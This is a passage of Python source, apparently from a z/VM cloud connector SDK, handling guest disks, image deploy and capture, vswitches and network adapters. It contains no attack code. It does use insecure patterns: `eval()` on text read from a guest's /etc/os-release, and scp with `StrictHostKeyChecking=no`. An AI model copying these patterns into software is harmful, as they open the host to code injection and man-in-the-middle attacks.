""" size = disk['size'] fmt = disk.get('format', 'ext4') disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool [diskpool_type, diskpool_name] = disk_pool.split(':') if (diskpool_type.upper() == 'ECKD'): action = 'add3390' else: action = 'add9336' rd = ' '.join(['changevm', userid, action, diskpool_name, vdev, size, '--mode MR']) if fmt and fmt != 'none': rd += (' --filesystem %s' % fmt.lower()) action = "add mdisk to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_vm_list(self): """Get the list of guests that are created by SDK return userid list""" action = "list all guests in database" with zvmutils.log_and_reraise_sdkbase_error(action): guests_in_db = self._GuestDbOperator.get_guest_list() guests_migrated = \ self._GuestDbOperator.get_migrated_guest_info_list() # db query return value in tuple (uuid, userid, metadata, comments) userids_in_db = [g[1].upper() for g in guests_in_db] userids_migrated = [g[1].upper() for g in guests_migrated] userid_list = list(set(userids_in_db) - set(userids_migrated)) return userid_list def _remove_mdisk(self, userid, vdev): rd = ' '.join(('changevm', userid, 'removedisk', vdev)) action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid) with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def guest_authorize_iucv_client(self, userid, client=None): """Punch a script that used to set the authorized client userid in vm If the guest is in log off status, the change will take effect when the guest start up at first time. If the guest is in active status, power off and power on are needed for the change to take effect. :param str guest: the user id of the vm :param str client: the user id of the client that can communicate to guest using IUCV""" client = client or zvmutils.get_smt_userid() iucv_path = "/tmp/" + userid if not os.path.exists(iucv_path): os.makedirs(iucv_path) iucv_auth_file = iucv_path + "/iucvauth.sh" zvmutils.generate_iucv_authfile(iucv_auth_file, client) try: requestData = "ChangeVM " + userid + " punchfile " + \ iucv_auth_file + " --class x" self._request(requestData) except exception.SDKSMTRequestFailed as err: msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:" " %s" % (userid, err.format_message())) LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) finally: self._pathutils.clean_temp_folder(iucv_path) def guest_deploy(self, userid, image_name, transportfiles=None, remotehost=None, vdev=None): """ Deploy image and punch config driver to target """ # (TODO: add the support of multiple disks deploy) msg = ('Start to deploy image %(img)s to guest %(vm)s' % {'img': image_name, 'vm': userid}) LOG.info(msg) image_file = '/'.join([self._get_image_path_by_name(image_name), CONF.zvm.user_root_vdev]) # Unpack image file to root disk vdev = vdev or CONF.zvm.user_root_vdev cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev, image_file] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("unpackdiskimage failed with return code: %d." 
% rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) raise exception.SDKGuestOperationError(rs=3, userid=userid, unpack_rc=rc, err=err_output) # Purge guest reader to clean dirty data rd = ("changevm %s purgerdr" % userid) action = "purge reader of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) # Punch transport files if specified if transportfiles: # Copy transport file to local msg = ('Start to send customized file to vm %s' % userid) LOG.info(msg) try: tmp_trans_dir = tempfile.mkdtemp() local_trans = '/'.join([tmp_trans_dir, os.path.basename(transportfiles)]) if remotehost: cmd = ["/usr/bin/scp", "-B", "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", ("%s:%s" % (remotehost, transportfiles)), local_trans] else: cmd = ["/usr/bin/cp", transportfiles, local_trans] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ('copy config drive with command %(cmd)s ' 'failed with output: %(res)s' % {'cmd': str(cmd), 'res': output}) LOG.error(err_msg) raise exception.SDKGuestOperationError(rs=4, userid=userid, err_info=err_msg) # Punch config drive to guest userid rd = ("changevm %(uid)s punchfile %(file)s --class X" % {'uid': userid, 'file': local_trans}) action = "punch config drive to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) finally: # remove the local temp config drive folder self._pathutils.clean_temp_folder(tmp_trans_dir) # Authorize iucv client self.guest_authorize_iucv_client(userid) # Update os version in guest metadata # TODO: may should append to old metadata, not replace image_info = self._ImageDbOperator.image_query_record(image_name) metadata = 'os_version=%s' % image_info[0]['imageosdistro'] self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata) msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s' ' successfully' % {'img': image_name, 'vm': userid, 'vdev': vdev}) LOG.info(msg) def guest_deploy_rhcos(self, userid, image_name, transportfiles, remotehost=None, vdev=None, hostname=None): """ Deploy image and punch config driver to target """ # (TODO: add the support of multiple disks deploy) msg = ('Start to deploy image %(img)s to guest %(vm)s' % {'img': image_name, 'vm': userid}) LOG.info(msg) image_file = '/'.join([self._get_image_path_by_name(image_name), CONF.zvm.user_root_vdev]) # Unpack image file to root disk vdev = vdev or CONF.zvm.user_root_vdev tmp_trans_dir = None if remotehost: # download igintion file from remote host tmp_trans_dir = tempfile.mkdtemp() local_trans = '/'.join([tmp_trans_dir, os.path.basename(transportfiles)]) cmd = ["/usr/bin/scp", "-B", "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", ("%s:%s" % (remotehost, transportfiles)), local_trans] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ('copy ignition file with command %(cmd)s ' 'failed with output: %(res)s' % {'cmd': str(cmd), 'res': output}) LOG.error(err_msg) raise exception.SDKGuestOperationError(rs=4, userid=userid, err_info=err_msg) transportfiles = local_trans cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name, transportfiles, vdev, image_file, hostname) with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: 
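                # unpackdiskimage returned a non-zero rc: collect the
                # "ERROR:" lines from its output and surface them in the
                # exception raised below.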
err_msg = ("unpackdiskimage failed with return code: %d." % rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) raise exception.SDKGuestOperationError(rs=3, userid=userid, unpack_rc=rc, err=err_output) # remove the temp ignition file if tmp_trans_dir: self._pathutils.clean_temp_folder(tmp_trans_dir) # Update os version in guest metadata # TODO: may should append to old metadata, not replace metadata = 'os_version=%s' % self.image_get_os_distro(image_name) self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata) msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s' ' successfully' % {'img': image_name, 'vm': userid, 'vdev': vdev}) LOG.info(msg) def guest_capture(self, userid, image_name, capture_type='rootonly', compress_level=6): if capture_type == "alldisks": func = ('Capture guest with type: %s' % capture_type) msg = ('%s is not supported in current release' % func) LOG.error(msg) raise exception.SDKFunctionNotImplementError(func=func, modID='guest') msg = ('Start to capture %(vm)s to generate image %(img)s with ' 'capture type %(type)s' % {'vm': userid, 'img': image_name, 'type': capture_type}) LOG.info(msg) self._check_power_state(userid, 'capture') # Make sure the iucv channel is ready for communication on source vm try: self.execute_cmd(userid, 'pwd') except exception.SDKSMTRequestFailed as err: msg = ('Failed to check iucv status on capture source vm ' '%(vm)s with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) # Get the os version of the vm try: os_version = self._guest_get_os_version(userid) except exception.SDKSMTRequestFailed as err: msg = ('Failed to execute command on capture source vm %(vm)s' 'to get os version with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except Exception as err: msg = ('Error happened when parsing os version on source vm ' '%(vm)s with error: %(err)s' % {'vm': userid, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) msg = ('The os version of capture source vm %(vm)s is %(version)s' % {'vm': userid, 'version': os_version}) LOG.info(msg) # Find the root device according to the capture type try: capture_devices = self._get_capture_devices(userid, capture_type) except exception.SDKSMTRequestFailed as err: msg = ('Failed to execute command on source vm %(vm)s to get the ' 'devices for capture with error %(err)s' % {'vm': userid, 'err': err.results['response'][0]}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except Exception as err: msg = ('Internal error happened when getting the devices for ' 'capture on source vm %(vm)s with error %(err)s' % {'vm': userid, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) except exception.SDKGuestOperationError: raise # Shutdown the vm before capture self.guest_softstop(userid) # Prepare directory for writing image file image_temp_dir = '/'.join((CONF.image.sdk_image_repository, const.IMAGE_TYPE['CAPTURE'], os_version, image_name)) self._pathutils.mkdir_if_not_exist(image_temp_dir) # Call creatediskimage to capture a vm to generate an image # TODO:(nafei) to support multiple disk capture vdev = 
capture_devices[0] msg = ('Found the device %(vdev)s of %(vm)s for capture' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) image_file_name = vdev image_file_path = '/'.join((image_temp_dir, image_file_name)) cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev, image_file_path, '--compression', str(compress_level)] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("creatediskimage failed with return code: %d." % rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) self._pathutils.clean_temp_folder(image_temp_dir) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=err_output) # Move the generated image to netboot folder image_final_dir = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], os_version, image_name]) image_final_path = '/'.join((image_final_dir, image_file_name)) self._pathutils.mkdir_if_not_exist(image_final_dir) cmd = ['mv', image_file_path, image_final_path] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("move image file from staging to netboot " "folder failed with return code: %d." % rc) LOG.error(err_msg) self._pathutils.clean_temp_folder(image_temp_dir) self._pathutils.clean_temp_folder(image_final_dir) raise exception.SDKGuestOperationError(rs=5, userid=userid, err=err_msg) self._pathutils.clean_temp_folder(image_temp_dir) msg = ('Updating the metadata for captured image %s ' % image_name) LOG.info(msg) # Get md5sum of image real_md5sum = self._get_md5sum(image_final_path) # Get disk_size_units of image disk_size_units = self._get_disk_size_units(image_final_path) # Get the image physical size image_size = self._get_image_size(image_final_path) # Create the image record in image database self._ImageDbOperator.image_add_record(image_name, os_version, real_md5sum, disk_size_units, image_size, capture_type) LOG.info('Image %s is captured and imported to image repository ' 'successfully' % image_name) def _guest_get_os_version(self, userid): os_version = '' release_file = self.execute_cmd(userid, 'ls /etc/*-release') if '/etc/os-release' in release_file: # Parse os-release file, part of the output looks like: # NAME="Red Hat Enterprise Linux Server" # ID="rhel" # VERSION_ID="7.0" release_info = self.execute_cmd(userid, 'cat /etc/os-release') release_dict = {} for item in release_info: if item: release_dict[item.split('=')[0]] = item.split('=')[1] distro = release_dict['ID'] version = release_dict['VERSION_ID'] if '"' in distro: distro = eval(distro) if '"' in version: version = eval(version) os_version = '%s%s' % (distro, version) return os_version elif '/etc/redhat-release' in release_file: # The output looks like: # "Red Hat Enterprise Linux Server release 6.7 (Santiago)" distro = 'rhel' release_info = self.execute_cmd(userid, 'cat /etc/redhat-release') distro_version = release_info[0].split()[6] os_version = ''.join((distro, distro_version)) return os_version elif '/etc/SuSE-release' in release_file: # The output for this file looks like: # SUSE Linux Enterprise Server 11 (s390x) # VERSION = 11 # PATCHLEVEL = 3 distro = 'sles' release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release') LOG.debug('OS release info is %s' % release_info) release_version = '.'.join((release_info[1].split('=')[1].strip(), release_info[2].split('=')[1].strip())) os_version = 
''.join((distro, release_version)) return os_version elif '/etc/system-release' in release_file: # For some rhel6.7 system, it only have system-release file and # the output looks like: # "Red Hat Enterprise Linux Server release 6.7 (Santiago)" distro = 'rhel' release_info = self.execute_cmd(userid, 'cat /etc/system-release') distro_version = release_info[0].split()[6] os_version = ''.join((distro, distro_version)) return os_version def _get_capture_devices(self, userid, capture_type='rootonly'): capture_devices = [] if capture_type == 'rootonly': # Parse the /proc/cmdline to get root devices proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline ' '| tr " " "\\n" | grep -a "^root=" | cut -c6-') root_device_info = proc_cmdline[0] if not root_device_info: msg = ('Unable to get useful info from /proc/cmdline to ' 'locate the device associated with the root directory ' 'on capture source vm %s' % userid) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) else: if 'UUID=' in root_device_info: uuid = root_device_info.split()[0].split('=')[1] root_device = '/'.join(('/dev/disk/by-uuid', uuid)) elif 'LABEL=' in root_device_info: label = root_device_info.split()[0].split('=')[1] root_device = '/'.join(('/dev/disk/by-label', label)) elif 'mapper' in root_device_info: msg = ('Capturing a disk with root filesystem on logical' ' volume is not supported') raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) else: root_device = root_device_info root_device_node = self.execute_cmd(userid, 'readlink -f %s' % root_device)[0] # Get device node vdev by node name cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' % root_device_node.split('/')[-1].rstrip(string.digits)) result = self.execute_cmd(userid, cmd)[0] root_device_vdev = result.split()[0][4:8] capture_devices.append(root_device_vdev) return capture_devices else: # For sysclone, parse the user directory entry to get the devices # for capture, leave for future pass def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name, transportfiles=None, vdev=None, image_file=None, hostname=None): os_version = self.image_get_os_distro(image_name) # Query image disk type image_disk_type = self._get_image_disk_type(image_name) if image_disk_type is None: err_msg = ("failed to get image disk type for " "image '%(image_name)s'." % {'image_name': image_name}) raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) try: # Query vm's disk pool type and image disk type from zvmsdk import dist _dist_manager = dist.LinuxDistManager() linuxdist = _dist_manager.get_linux_dist(os_version)() # Read coros fixed ip parameter from tempfile fixed_ip_parameter = linuxdist.read_coreos_parameter(userid) except Exception as err: err_msg = ("failed to read coreos fixed ip" "parameters for userid '%(userid)s'," "error: %(err)s." 
% {'userid': userid, 'err': err}) raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) if fixed_ip_parameter is None: err_msg = ("coreos fixed ip parameters don't exist.") raise exception.SDKGuestOperationError(rs=12, userid=userid, err=err_msg) if hostname is not None: # replace hostname to display name instead of userid fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(), hostname) # read nic device id and change it into the form like # "0.0.1000,0.0.1001,0.0.1002" nic_id = self._generate_increasing_nic_id( fixed_ip_parameter.split(":")[5].replace("enc", "")) return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev, image_file, transportfiles, image_disk_type, nic_id, fixed_ip_parameter] def grant_user_to_vswitch(self, vswitch_name, userid): """Set vswitch to grant user.""" smt_userid = zvmutils.get_smt_userid() requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid, "--operands", "-k switch_name=%s" % vswitch_name, "-k grant_userid=%s" % userid, "-k persist=YES")) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to grant user %s to vswitch %s, error: %s" % (userid, vswitch_name, err.format_message())) self._set_vswitch_exception(err, vswitch_name) def _set_vswitch_exception(self, error, switch_name): if ((error.results['rc'] == 212) and (error.results['rs'] == 40)): obj_desc = "Vswitch %s" % switch_name raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)): errmsg = ("Operation is not allowed for a " "VLAN UNAWARE vswitch") raise exception.SDKConflictError(modID='network', rs=5, vsw=switch_name, msg=errmsg) elif ((error.results['rc'] == 396) and ((error.results['rs'] == 2838) or (error.results['rs'] == 2853) or (error.results['rs'] == 2856) or (error.results['rs'] == 2858) or (error.results['rs'] == 3022) or (error.results['rs'] == 3033))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=5, vsw=switch_name, msg=errmsg) else: raise error def revoke_user_from_vswitch(self, vswitch_name, userid): """Revoke user for vswitch.""" smt_userid = zvmutils.get_smt_userid() requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid, "--operands", "-k switch_name=%s" % vswitch_name, "-k revoke_userid=%s" % userid, "-k persist=YES")) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to revoke user %s from vswitch %s, error: %s" % (userid, vswitch_name, err.format_message())) self._set_vswitch_exception(err, vswitch_name) def image_performance_query(self, uid_list): """Call Image_Performance_Query to get guest current status. 
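        The result is a dictionary keyed by userid; each value holds the
        parsed performance fields (guest_cpus, used_cpu_time, used_memory,
        max_memory, ...) as strings. Shape only, values are illustrative:

            {'GUEST1': {'userid': 'GUEST1', 'guest_cpus': '2', ...}}
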
:uid_list: A list of zvm userids to be queried """ if uid_list == []: return {} if not isinstance(uid_list, list): uid_list = [uid_list] smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Image_Performance_Query" % smt_userid, "--operands", '-T "%s"' % (' '.join(uid_list)), "-c %d" % len(uid_list))) action = "get performance info of userid '%s'" % str(uid_list) with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) ipq_kws = { 'userid': "Guest name:", 'guest_cpus': "Guest CPUs:", 'used_cpu_time': "Used CPU time:", 'elapsed_cpu_time': "Elapsed time:", 'min_cpu_count': "Minimum CPU count:", 'max_cpu_limit': "Max CPU limit:", 'samples_cpu_in_use': "Samples CPU in use:", 'samples_cpu_delay': "Samples CPU delay:", 'used_memory': "Used memory:", 'max_memory': "Max memory:", 'min_memory': "Minimum memory:", 'shared_memory': "Shared memory:", } pi_dict = {} pi = {} rpi_list = ('\n'.join(results['response'])).split("\n\n") for rpi in rpi_list: try: pi = zvmutils.translate_response_to_dict(rpi, ipq_kws) except exception.SDKInternalError as err: emsg = err.format_message() # when there is only one userid queried and this userid is # in 'off'state, the smcli will only returns the queried # userid number, no valid performance info returned. if(emsg.__contains__("No value matched with keywords.")): continue else: raise err for k, v in pi.items(): pi[k] = v.strip('" ') if pi.get('userid') is not None: pi_dict[pi['userid']] = pi return pi_dict def system_image_performance_query(self, namelist): """Call System_Image_Performance_Query to get guest current status. :namelist: A namelist that defined in smapi namelist file. """ smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API System_Image_Performance_Query" % smt_userid, "--operands -T %s" % namelist)) action = "get performance info of namelist '%s'" % namelist with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) ipq_kws = { 'userid': "Guest name:", 'guest_cpus': "Guest CPUs:", 'used_cpu_time': "Used CPU time:", 'elapsed_cpu_time': "Elapsed time:", 'min_cpu_count': "Minimum CPU count:", 'max_cpu_limit': "Max CPU limit:", 'samples_cpu_in_use': "Samples CPU in use:", 'samples_cpu_delay': "Samples CPU delay:", 'used_memory': "Used memory:", 'max_memory': "Max memory:", 'min_memory': "Minimum memory:", 'shared_memory': "Shared memory:", } pi_dict = {} pi = {} rpi_list = ('\n'.join(results['response'])).split("\n\n") for rpi in rpi_list: try: pi = zvmutils.translate_response_to_dict(rpi, ipq_kws) except exception.SDKInternalError as err: emsg = err.format_message() # when there is only one userid queried and this userid is # in 'off'state, the smcli will only returns the queried # userid number, no valid performance info returned. 
if(emsg.__contains__("No value matched with keywords.")): continue else: raise err for k, v in pi.items(): pi[k] = v.strip('" ') if pi.get('userid') is not None: pi_dict[pi['userid']] = pi return pi_dict def virtual_network_vswitch_query_byte_stats(self): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" % smt_userid, "--operands", '-T "%s"' % smt_userid, '-k "switch_name=*"' )) action = "query vswitch usage info" with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) return self._parse_vswitch_inspect_data(results['response']) def get_host_info(self): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getHost general") host_info = zvmutils.translate_response_to_dict( '\n'.join(results['response']), const.RINV_HOST_KEYWORDS) return host_info def get_diskpool_info(self, pool): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getHost diskpoolspace %s" % pool) dp_info = zvmutils.translate_response_to_dict( '\n'.join(results['response']), const.DISKPOOL_KEYWORDS) return dp_info def get_vswitch_list(self): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid, "--operands", "-s \'*\'")) try: result = self._request(rd) except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 212) and (err.results['rs'] == 40)): LOG.warning("No Virtual switch in the host") return [] else: LOG.error("Failed to get vswitch list, error: %s" % err.format_message()) raise with zvmutils.expect_invalid_resp_data(): if (not result['response'] or not result['response'][0]): return [] else: data = '\n'.join([s for s in result['response'] if isinstance(s, six.string_types)]) output = re.findall('VSWITCH: Name: (.*)', data) return output def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id): smt_userid = zvmutils.get_smt_userid() msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s ' 'for guest %(vm)s' % {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid}) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Set_Extended" % smt_userid, "--operands", "-k grant_userid=%s" % userid, "-k switch_name=%s" % vswitch_name, "-k user_vlan_id=%s" % vlan_id, "-k persist=YES")) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, " "error: %s" % (vlan_id, vswitch_name, userid, err.format_message())) self._set_vswitch_exception(err, vswitch_name) msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s ' 'for guest %(vm)s successfully' % {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid}) LOG.info(msg) def add_vswitch(self, name, rdev=None, controller='*', connection='CONNECT', network_type='ETHERNET', router="NONROUTER", vid='UNAWARE', port_type='ACCESS', gvrp='GVRP', queue_mem=8, native_vid=1, persist=True): smt_userid = zvmutils.get_smt_userid() msg = ('Start to create vswitch %s' % name) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Create_Extended" % smt_userid, "--operands", '-k switch_name=%s' % name)) if rdev is not None: rd += " -k real_device_address" +\ "=\'%s\'" % rdev.replace(',', ' ') if controller != '*': rd += " -k controller_name=%s" % controller rd = ' '.join((rd, "-k connection_value=%s" % connection, "-k queue_memory_limit=%s" % queue_mem, "-k transport_type=%s" % network_type, "-k vlan_id=%s" % vid, "-k persist=%s" % (persist and 'YES' or 'NO'))) # Only if vswitch is vlan awared, 
port_type, gvrp and native_vid are # allowed to specified if isinstance(vid, int) or vid.upper() != 'UNAWARE': rd = ' '.join((rd, "-k port_type=%s" % port_type, "-k gvrp_value=%s" % gvrp, "-k native_vlanid=%s" % native_vid)) if router is not None: rd += " -k routing_value=%s" % router msg = ('Start to create vswitch %s' % name) LOG.info(msg) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to create vswitch %s, error: %s" % (name, err.format_message())) raise msg = ('Create vswitch %s successfully' % name) LOG.info(msg) def set_vswitch(self, switch_name, **kwargs): """Set vswitch""" smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Set_Extended" % smt_userid, "--operands", "-k switch_name=%s" % switch_name)) for k, v in kwargs.items(): rd = ' '.join((rd, "-k %(key)s=\'%(value)s\'" % {'key': k, 'value': v})) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to set vswitch %s, error: %s" % (switch_name, err.format_message())) self._set_vswitch_exception(err, switch_name) def delete_vswitch(self, switch_name, persist=True): smt_userid = zvmutils.get_smt_userid() msg = ('Start to delete vswitch %s' % switch_name) LOG.info(msg) rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" % smt_userid, "--operands", "-k switch_name=%s" % switch_name, "-k persist=%s" % (persist and 'YES' or 'NO'))) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results if ((results['rc'] == 212) and (results['rs'] == 40)): LOG.warning("Vswitch %s does not exist", switch_name) return else: LOG.error("Failed to delete vswitch %s, error: %s" % (switch_name, err.format_message())) raise msg = ('Delete vswitch %s successfully' % switch_name) LOG.info(msg) def create_nic(self, userid, vdev=None, nic_id=None, mac_addr=None, active=False): nic_vdev = self._get_available_vdev(userid, vdev=vdev) LOG.debug('Nic attributes: vdev is %(vdev)s, ' 'ID is %(id)s, address is %(address)s', {'vdev': nic_vdev, 'id': nic_id or 'not specified', 'address': mac_addr or 'not specified'}) self._create_nic(userid, nic_vdev, nic_id=nic_id, mac_addr=mac_addr, active=active) return nic_vdev def _create_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=7, vdev=vdev, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=7, vdev=vdev, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _create_nic_active_exception(self, error, userid, vdev): if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or ((error.results['rc'] == 204) and (error.results['rs'] == 28))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) elif ((error.results['rc'] == 396) and (error.results['rs'] == 2797)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _is_active(self, userid): # Get the vm status power_state = self.get_power_state(userid) if power_state == 
'off': LOG.error('The vm %s is powered off, ' 'active operation is not allowed' % userid) raise exception.SDKConflictError(modID='network', rs=1, userid=userid) def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None, active=False): if active: self._is_active(userid) msg = ('Start to create nic device %(vdev)s for guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' % userid, "--operands", "-k image_device_number=%s" % vdev, "-k adapter_type=QDIO")) if mac_addr is not None: mac = ''.join(mac_addr.split(':'))[6:] requestData += ' -k mac_id=%s' % mac try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to create nic %s for user %s in " "the guest's user direct, error: %s" % (vdev, userid, err.format_message())) self._create_nic_inactive_exception(err, userid, vdev) if active: if mac_addr is not None: LOG.warning("Ignore the mac address %s when " "adding nic on an active system" % mac_addr) requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Create_Extended' % userid, "--operands", "-k image_device_number=%s" % vdev, "-k adapter_type=QDIO")) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err1: msg1 = err1.format_message() persist_OK = True requestData = ' '.join(( 'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid, "--operands", '-v %s' % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: results = err2.results msg2 = err2.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): persist_OK = True else: persist_OK = False if persist_OK: self._create_nic_active_exception(err1, userid, vdev) else: raise exception.SDKNetworkOperationError(rs=4, nic=vdev, userid=userid, create_err=msg1, revoke_err=msg2) self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id) msg = ('Create nic device %(vdev)s for guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def get_user_direct(self, userid): with zvmutils.log_and_reraise_smt_request_failed(): results = self._request("getvm %s directory" % userid) return results.get('response', []) def _delete_nic_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=8, vdev=vdev, userid=userid, msg=errmsg) else: raise error def _delete_nic_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=9, vdev=vdev, userid=userid, obj=obj_desc) else: raise error def delete_nic(self, userid, vdev, active=False): if active: self._is_active(userid) vdev_exist = False nic_list = self._NetDbOperator.switch_select_record_for_userid(userid) for p in nic_list: if (int(p['interface'], 16) == int(vdev, 16)): vdev_exist = True vdev_info = p break if not vdev_exist: # Device has already be removed from user direct LOG.warning("Virtual device %s does not exist in the switch table", vdev) if active: try: resp = self.execute_cmd(userid, 'vmcp q %s' % vdev) nic_info = "%s ON NIC" % vdev.zfill(4).upper() osa_info = "%s ON OSA" % vdev.zfill(4).upper() if nic_info in resp[0]: pass elif osa_info in resp[0]: self._undedicate_nic(userid, vdev, active=active, del_active_only=True) return else: 
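                    # 'vmcp q <vdev>' matched neither "<vdev> ON NIC" nor
                    # "<vdev> ON OSA", so this address is not a network
                    # adapter and there is nothing more to clean up here.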
